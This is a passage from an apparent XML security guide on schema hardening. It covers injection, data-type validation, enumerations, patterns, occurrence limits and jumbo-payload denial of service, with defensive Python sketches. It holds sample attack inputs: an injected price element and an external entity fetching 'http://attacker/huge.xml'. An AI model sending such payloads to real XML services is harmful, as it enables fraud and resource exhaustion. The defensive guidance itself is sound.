Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closes the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and sets the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10. If the application processes only the first values provided for the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
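&lt;br /&gt;
Even without a schema, an application could verify the structure before reading any values. The following Python sketch assumes the message must contain exactly one &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; followed by one &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;; the helper names are hypothetical, and the elements are built programmatically here only to stand in for a parsed message:&lt;br /&gt;

```python
import xml.etree.ElementTree as ET

EXPECTED_CHILDREN = ["id", "price"]  # assumed structure of the buy element


def has_expected_structure(buy):
    """Return True only if buy has exactly one id followed by one price."""
    return buy.tag == "buy" and [child.tag for child in buy] == EXPECTED_CHILDREN


def build_buy(children):
    """Build a buy element from (tag, text) pairs, standing in for a parsed message."""
    buy = ET.Element("buy")
    for tag, text in children:
        ET.SubElement(buy, tag).text = text
    return buy


legitimate = build_buy([("id", "123"), ("price", "10")])
injected = build_buy([("id", "123"), ("price", "0"), ("id", None), ("price", "10")])
# has_expected_structure(legitimate) returns True
# has_expected_structure(injected) returns False
```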
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
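&lt;br /&gt;
When the schema language cannot express such limits, the application has to enforce them itself. The following Python sketch restricts the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; value to at most three digits and an upper bound of 150; both limits and the name &amp;lt;tt&amp;gt;is_valid_age&amp;lt;/tt&amp;gt; are assumptions chosen for illustration, and signs are deliberately not accepted:&lt;br /&gt;

```python
import re

AGE_PATTERN = re.compile(r"[0-9]{1,3}")  # assumed limit: one to three ASCII digits


def is_valid_age(text):
    """Return True if text is one to three digits and not greater than 150."""
    if AGE_PATTERN.fullmatch(text) is None:
        return False
    return 150 >= int(text)
```

The one-million-digit value from the example fails the length restriction before any numeric conversion is attempted.&lt;br /&gt;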
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
If you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption some values must be encoded using base64. This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and considered it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema.&lt;br /&gt;
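&lt;br /&gt;
The same partial check can happen in application code when a lenient decoder is used. In Python, for instance, &amp;lt;tt&amp;gt;base64.b64decode&amp;lt;/tt&amp;gt; discards characters outside the base64 alphabet unless &amp;lt;tt&amp;gt;validate=True&amp;lt;/tt&amp;gt; is passed. The following sketch shows the strict variant; &amp;lt;tt&amp;gt;decode_cipher_value&amp;lt;/tt&amp;gt; is a hypothetical name:&lt;br /&gt;

```python
import base64
import binascii


def decode_cipher_value(text):
    """Decode text as base64, returning None if any character is not valid base64."""
    try:
        # validate=True rejects characters outside the base64 alphabet
        # instead of silently discarding them.
        return base64.b64decode(text, validate=True)
    except binascii.Error:
        return None


# decode_cipher_value("Zm9v") returns b"foo"
# decode_cipher_value("Zm9v$trailing") returns None
```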
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Positive numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Negative numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type rules out unexpected characters. Once the application receives the previous message, it may calculate the final price as &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt; allows negative values, an attacker who provides a negative quantity could produce a negative total on the user’s account. To avoid that logical vulnerability, the schema should use &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; instead of &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt;.&lt;br /&gt;
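&lt;br /&gt;
As a rough illustration of this logic flaw, the following Python sketch computes the total the way a naive application might, and then applies the lexical rule for &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt;. The function names &amp;lt;tt&amp;gt;order_total&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;is_positive_integer&amp;lt;/tt&amp;gt; are hypothetical, and the regular expression only approximates what a schema validator would enforce:&lt;br /&gt;

```python
import re
from decimal import Decimal

# Approximate lexical form of xs:positiveInteger: optional plus sign,
# optional leading zeros, then at least one non-zero digit.
POSITIVE_INTEGER = re.compile(r"\+?0*[1-9][0-9]*")


def order_total(price, quantity):
    """Compute price*quantity the way a naive application might (hypothetical helper)."""
    return Decimal(price) * int(quantity)


def is_positive_integer(text):
    """Return True when text looks like a valid xs:positiveInteger literal."""
    return POSITIVE_INTEGER.fullmatch(text) is not None


# An integer-typed quantity of -5 passes an xs:integer check but yields a negative total.
print(order_total("10", "-5"))
print(is_positive_integer("-5"), is_positive_integer("1"))
```

With an &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt; quantity, the negative total is computed without complaint. The stricter check rejects the value before any arithmetic takes place.&lt;br /&gt;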
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever user-controlled values are used as denominators in a division, developers should disallow the number zero. When zero is used as a divisor in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions, and the program may crash. XML schemas provide data types that exclude the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element.&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These special values may be useful in some contexts, but the problem is that &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; are commonly used for fields that should hold only real numbers, such as prices. This error is also common in programming languages and is not restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
With the &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; data type, a price set to Infinity or NaN is rejected during validation, so it cannot trigger errors in the application. If the schema allowed those values, an attacker could exploit them.&lt;br /&gt;
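&lt;br /&gt;
The difference between the two data types can be sketched in Python. This is only an approximation: &amp;lt;tt&amp;gt;XS_DECIMAL&amp;lt;/tt&amp;gt; is a hand-written regular expression for the lexical form of &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt;, and both function names are hypothetical. A real application would rely on a schema validator instead:&lt;br /&gt;

```python
import math
import re

# Approximate lexical form of xs:decimal: optional sign, digits, optional fraction.
XS_DECIMAL = re.compile(r"[+-]?([0-9]+(\.[0-9]*)?|\.[0-9]+)")


def is_xs_decimal(text):
    """Return True when text looks like a valid xs:decimal literal."""
    return XS_DECIMAL.fullmatch(text.strip()) is not None


def parse_price_unsafely(text):
    """Parse a price as a float; float() also accepts INF, -INF and NaN."""
    return float(text)


for candidate in ("10", "9.99", "INF", "-INF", "NaN"):
    print(candidate, is_xs_decimal(candidate), parse_price_unsafely(candidate))
```

The special values parse cleanly as floats but fail the decimal check, which is the behavior the schema above relies on.&lt;br /&gt;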
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid.&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should be restricted to specific sets: traffic lights have only three colors, only 12 months are available, and so on. The schema can put these restrictions in place for each element or attribute. This is the ideal whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element &amp;lt;tt&amp;gt;month&amp;lt;/tt&amp;gt; to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
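&lt;br /&gt;
An application that cannot validate against the schema could mirror the same whitelist in code. The following Python sketch assumes a hypothetical helper named &amp;lt;tt&amp;gt;is_valid_month&amp;lt;/tt&amp;gt;. Like an enumeration over &amp;lt;tt&amp;gt;xs:string&amp;lt;/tt&amp;gt;, it compares values exactly and is case sensitive:&lt;br /&gt;

```python
# The same twelve values listed in the enumeration above.
VALID_MONTHS = frozenset({
    "January", "February", "March", "April", "May", "June",
    "July", "August", "September", "October", "November", "December",
})


def is_valid_month(value):
    """Return True only for an exact match against the whitelist."""
    return value in VALID_MONTHS


for candidate in ("May", "may", "May; DROP TABLE orders"):
    print(repr(candidate), is_valid_month(candidate))
```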
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where valid values must have one specific length (for example, 8), the exact length can be specified as follows:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only values between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as an SSN.&lt;br /&gt;
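&lt;br /&gt;
The same pattern can be checked outside a schema validator. The Python sketch below uses a hypothetical function named &amp;lt;tt&amp;gt;is_valid_ssn&amp;lt;/tt&amp;gt;. It assumes that schema patterns must match the whole value (hence &amp;lt;tt&amp;gt;fullmatch&amp;lt;/tt&amp;gt;) and that &amp;lt;tt&amp;gt;xs:token&amp;lt;/tt&amp;gt; collapses whitespace before the pattern is applied:&lt;br /&gt;

```python
import re

# Same expression as the xs:pattern facet above.
SSN_PATTERN = re.compile(r"[0-9]{3}-[0-9]{2}-[0-9]{4}")


def is_valid_ssn(value):
    """Return True when the whole value matches the SSN pattern."""
    # Approximate the whitespace collapsing that xs:token performs.
    normalized = " ".join(value.split())
    return SSN_PATTERN.fullmatch(normalized) is not None


for candidate in ("123-45-6789", "123-45-67890", "123-45-6789 OR 1=1"):
    print(repr(candidate), is_valid_ssn(candidate))
```

Using a search instead of a full match would accept the last candidate, since it merely contains a well-formed SSN.&lt;br /&gt;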
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components (introduced in XML Schema 1.1) constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed.&lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
Not defining a maximum number of occurrences can have serious consequences when the application receives an extreme number of items to process. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) number of &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements. This is a common finding, since developers do not normally want to restrict the maximum number of occurrences. Applications using limitless occurrences should test what happens when they receive an extremely large number of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER '''LARGENAME1'''=&amp;quot;'''LARGEVALUE'''&amp;quot; '''LARGENAME2'''=&amp;quot;'''LARGEVALUE2'''&amp;quot; '''LARGENAME3'''=&amp;quot;'''LARGEVALUE3'''&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''file''' SYSTEM &amp;quot;'''http://attacker/huge.xml'''&amp;quot; &amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
